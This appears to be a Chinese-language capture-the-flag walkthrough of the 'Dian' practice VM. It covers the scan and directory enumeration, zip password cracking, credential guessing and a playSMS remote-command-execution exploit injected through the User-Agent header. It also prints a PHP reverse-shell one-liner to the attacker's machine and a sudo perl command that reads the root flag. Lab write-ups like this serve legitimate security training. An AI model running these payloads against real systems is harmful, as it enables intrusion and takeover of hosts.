Dian是一臺滲透測試用的虛擬環境,只是用於娛樂的主機,不過玩的還是挺開心的。寫點筆記作爲參考。使用的網絡環境爲NAT模式。
發現目標主機
利用掃描工具nmap掃描目標網段,尋找存活的目標主機。我的NAT模式網段在192.168.43.1這個網段上,可以用命令:
nmap 192.168.43.0/24
掃描目標端內所有的存活主機
發現目標主機:192.168.43.130
開放端口:80
訪問目標服務器
查看源代碼什麼的,發現沒有什麼入口什麼的。可能需要尋找其他的入侵點。
發現登錄入口
沒事就看看robots.txt,沒準就有驚喜。查看robots.txt。真的有驚喜!!!
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads
這幾個幾個頁面依次訪問一下,除了\nothing
這個頁面,其他的都一個個文件夾,一度讓我以爲是文件上傳,卡了很久。。。。。。頭疼。後來想了一下,會不會還有什麼頁面沒有出現,用dirb
–kali下的一個掃描的軟件–默認字典就夠了。
發現頁面:http://192.168.43.130/secure/
,訪問得到一個壓縮包,打開需要密碼,結合前面noting頁面發現的幾個密碼,一個個嘗試發現工作量也不是很大,或者使用zip2John爆破,可以發現密碼爲freedom
nothing頁面發現的密碼:
打開壓縮包,提取文件,是一個後綴爲MP3的文件,但是。。。我並不想聽音樂,所以,先用strings命令查看一下有沒有特殊的東西,有線索。。
ok,發現新的頁面,繼續訪問,是個登錄頁面,從壓縮包中獲取的文件得知,只有用戶名,密碼還是得一個個試。。。。測試過後得到:
username:touhid
password:diana
getshell
登錄,發現是一個playSMS的網站,上網找一下有沒有漏洞,早exploit-DB上面發現一個遠程命令執行,發現可以使用,具體漏洞:https://www.exploit-db.com/exploits/42044。查看可知漏洞的點在於電話簿用戶信息的導入,具體利用方式在漏洞說明中很清楚。直接可以使用。
漏洞利用文件:
上傳,利用burpsuite抓包,由於執行的命令在USER_AGENT,所以修改http請求的USER_AGENT的內容爲我們要執行的命令就可以了。
結果:
下一步就是反彈shell了,我的kali攻擊機的IP地址爲:192.168.43.129,所以把shell反彈到這就行了,監聽kali 的8008端口:
利用命令:
php -r '$sock=fsockopen("192.168.43.129",8008);exec("/bin/sh -i <&3 >&3 2>&3");'
getshell:
成功進入主機!!!
sudo perl -e 'exec "cat /root/flag.txt";'
hack it!!